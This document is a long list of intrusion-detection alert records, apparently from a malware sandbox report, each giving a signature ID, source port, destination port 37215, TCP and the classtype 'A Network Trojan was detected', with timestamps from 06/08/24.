          SID:2835222
          Source Port:59426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552106
          SID:2835222
          Source Port:47994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799953
          SID:2835222
          Source Port:52528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542882
          SID:2829579
          Source Port:55822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747218
          SID:2829579
          Source Port:44720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242512
          SID:2829579
          Source Port:52370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161414
          SID:2829579
          Source Port:56202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444541
          SID:2829579
          Source Port:46896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884129
          SID:2835222
          Source Port:52552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731177
          SID:2829579
          Source Port:48138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259999
          SID:2835222
          Source Port:45594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729330
          SID:2829579
          Source Port:51874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739742
          SID:2829579
          Source Port:35242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462208
          SID:2835222
          Source Port:58998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306649
          SID:2835222
          Source Port:60146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179956
          SID:2829579
          Source Port:57466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549682
          SID:2835222
          Source Port:48068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670642
          SID:2829579
          Source Port:51406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108769
          SID:2835222
          Source Port:33258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132832
          SID:2829579
          Source Port:53522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.801083
          SID:2829579
          Source Port:60608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.902272
          SID:2835222
          Source Port:44076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160948
          SID:2835222
          Source Port:35254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351308
          SID:2829579
          Source Port:58580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354545
          SID:2829579
          Source Port:55054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044898
          SID:2835222
          Source Port:35120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841710
          SID:2835222
          Source Port:51468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792801
          SID:2829579
          Source Port:52816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018223
          SID:2835222
          Source Port:59732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602530
          SID:2835222
          Source Port:53754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242255
          SID:2835222
          Source Port:43040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911374
          SID:2835222
          Source Port:55526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395407
          SID:2829579
          Source Port:41060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.066333
          SID:2829579
          Source Port:42426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511287
          SID:2835222
          Source Port:56386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495703
          SID:2829579
          Source Port:54530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407093
          SID:2829579
          Source Port:49332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084893
          SID:2829579
          Source Port:51874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040269
          SID:2829579
          Source Port:48834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275353
          SID:2829579
          Source Port:33550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106267
          SID:2835222
          Source Port:35100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155388
          SID:2835222
          Source Port:52432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170536
          SID:2835222
          Source Port:35420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844049
          SID:2829579
          Source Port:38320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.666959
          SID:2835222
          Source Port:35530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015069
          SID:2829579
          Source Port:37978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259632
          SID:2829579
          Source Port:39462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040470
          SID:2829579
          Source Port:47048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897022
          SID:2829579
          Source Port:40648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238399
          SID:2829579
          Source Port:35040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042171
          SID:2835222
          Source Port:36298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020851
          SID:2829579
          Source Port:57814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173807
          SID:2835222
          Source Port:59162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267959
          SID:2829579
          Source Port:55134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444298
          SID:2835222
          Source Port:56040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806841
          SID:2829579
          Source Port:42506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554108
          SID:2835222
          Source Port:58304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707125
          SID:2835222
          Source Port:42892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707043
          SID:2829579
          Source Port:40634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.831137
          SID:2835222
          Source Port:33316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442167
          SID:2829579
          Source Port:54674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549935
          SID:2835222
          Source Port:50274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176770
          SID:2829579
          Source Port:35684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270682
          SID:2835222
          Source Port:44694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173956
          SID:2829579
          Source Port:42156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108810
          SID:2835222
          Source Port:33492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816386
          SID:2829579
          Source Port:33864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444456
          SID:2835222
          Source Port:56796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670009
          SID:2835222
          Source Port:43388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351585
          SID:2835222
          Source Port:48554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165536
          SID:2829579
          Source Port:44104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136200
          SID:2829579
          Source Port:54464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153108
          SID:2835222
          Source Port:44986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783473
          SID:2829579
          Source Port:34584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456405
          SID:2835222
          Source Port:55314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603208
          SID:2829579
          Source Port:60818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891285
          SID:2835222
          Source Port:37176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463189
          SID:2829579
          Source Port:55300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461506
          SID:2835222
          Source Port:52444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268033
          SID:2829579
          Source Port:48480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021065
          SID:2829579
          Source Port:58574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515297
          SID:2829579
          Source Port:49616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460403
          SID:2829579
          Source Port:57922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.026065
          SID:2835222
          Source Port:45324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466771
          SID:2829579
          Source Port:45878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240494
          SID:2829579
          Source Port:34270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242189
          SID:2829579
          Source Port:51940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707299
          SID:2829579
          Source Port:60068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161237
          SID:2829579
          Source Port:48064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603009
          SID:2829579
          Source Port:44434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510338
          SID:2829579
          Source Port:46802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014643
          SID:2835222
          Source Port:40786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113589
          SID:2835222
          Source Port:54820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730870
          SID:2835222
          Source Port:56796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155562
          SID:2829579
          Source Port:56160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844503
          SID:2835222
          Source Port:53276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861392
          SID:2829579
          Source Port:43316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550985
          SID:2829579
          Source Port:55746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.265990
          SID:2829579
          Source Port:47960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155777
          SID:2835222
          Source Port:54450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894704
          SID:2829579
          Source Port:51620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516868
          SID:2835222
          Source Port:36930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797492
          SID:2829579
          Source Port:40470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806874
          SID:2829579
          Source Port:45388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238051
          SID:2829579
          Source Port:51364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894922
          SID:2829579
          Source Port:50874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808709
          SID:2829579
          Source Port:46922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784189
          SID:2835222
          Source Port:42332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405903
          SID:2829579
          Source Port:39738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020217
          SID:2835222
          Source Port:48602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273486
          SID:2829579
          Source Port:59616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352678
          SID:2835222
          Source Port:39352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107292
          SID:2829579
          Source Port:35792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133803
          SID:2835222
          Source Port:51944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354112
          SID:2829579
          Source Port:55520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108620
          SID:2835222
          Source Port:40864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.099384
          SID:2829579
          Source Port:40228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356455
          SID:2835222
          Source Port:44288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546716
          SID:2829579
          Source Port:41882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465259
          SID:2829579
          Source Port:51282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155901
          SID:2829579
          Source Port:36192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794775
          SID:2835222
          Source Port:34150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.598511
          SID:2835222
          Source Port:34918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912195
          SID:2835222
          Source Port:49078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044083
          SID:2829579
          Source Port:58620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131091
          SID:2835222
          Source Port:42896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352811
          SID:2829579
          Source Port:44908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600580
          SID:2835222
          Source Port:32890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174881
          SID:2829579
          Source Port:58366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180640
          SID:2835222
          Source Port:56344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553096
          SID:2829579
          Source Port:32984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673787
          SID:2835222
          Source Port:39166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155859
          SID:2829579
          Source Port:54658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355114
          SID:2829579
          Source Port:58472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708713
          SID:2829579
          Source Port:47426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183924
          SID:2835222
          Source Port:40088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041588
          SID:2835222
          Source Port:42982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732538
          SID:2829579
          Source Port:42702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787411
          SID:2829579
          Source Port:60244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132736
          SID:2829579
          Source Port:59650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238509
          SID:2835222
          Source Port:34604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516608
          SID:2829579
          Source Port:35030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670288
          SID:2835222
          Source Port:54004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857366
          SID:2835222
          Source Port:56370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857454
          SID:2835222
          Source Port:43278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600006
          SID:2829579
          Source Port:33498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741332
          SID:2829579
          Source Port:59426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160043
          SID:2829579
          Source Port:39338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396975
          SID:2835222
          Source Port:44422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018605
          SID:2829579
          Source Port:37822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306518
          SID:2829579
          Source Port:45258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402618
          SID:2835222
          Source Port:49978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019836
          SID:2835222
          Source Port:43798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355562
          SID:2835222
          Source Port:40964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261029
          SID:2835222
          Source Port:57216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155243
          SID:2835222
          Source Port:42284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355195
          SID:2829579
          Source Port:58146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355693
          SID:2835222
          Source Port:39820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706907
          SID:2829579
          Source Port:40364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263774
          SID:2835222
          Source Port:47552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669720
          SID:2829579
          Source Port:45252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517649
          SID:2829579
          Source Port:55342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157957
          SID:2829579
          Source Port:42502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707956
          SID:2829579
          Source Port:47430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738388
          SID:2829579
          Source Port:42792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038227
          SID:2829579
          Source Port:32900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896862
          SID:2829579
          Source Port:38394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407760
          SID:2835222
          Source Port:40022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075707
          SID:2829579
          Source Port:41922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170646
          SID:2829579
          Source Port:33946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404954
          SID:2829579
          Source Port:34224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191312
          SID:2829579
          Source Port:38094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273147
          SID:2835222
          Source Port:34870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037083
          SID:2835222
          Source Port:50078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792701
          SID:2829579
          Source Port:47708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242223
          SID:2835222
          Source Port:59652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860265
          SID:2835222
          Source Port:57186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887201
          SID:2835222
          Source Port:43030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.807625
          SID:2835222
          Source Port:39696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175870
          SID:2835222
          Source Port:47668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671769
          SID:2835222
          Source Port:41534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136034
          SID:2835222
          Source Port:34786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.189235
          SID:2835222
          Source Port:55064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017597
          SID:2835222
          Source Port:32974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797752
          SID:2835222
          Source Port:33942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040154
          SID:2835222
          Source Port:49486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134153
          SID:2829579
          Source Port:58382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599445
          SID:2835222
          Source Port:53886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743625
          SID:2835222
          Source Port:35728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745929
          SID:2835222
          Source Port:58008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789949
          SID:2829579
          Source Port:35908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896884
          SID:2835222
          Source Port:34616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832510
          SID:2835222
          Source Port:40062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175604
          SID:2829579
          Source Port:49130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272961
          SID:2829579
          Source Port:60654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.183502
          SID:2835222
          Source Port:50898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729119
          SID:2829579
          Source Port:48718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160104
          SID:2835222
          Source Port:35368
          Destination Port:37215
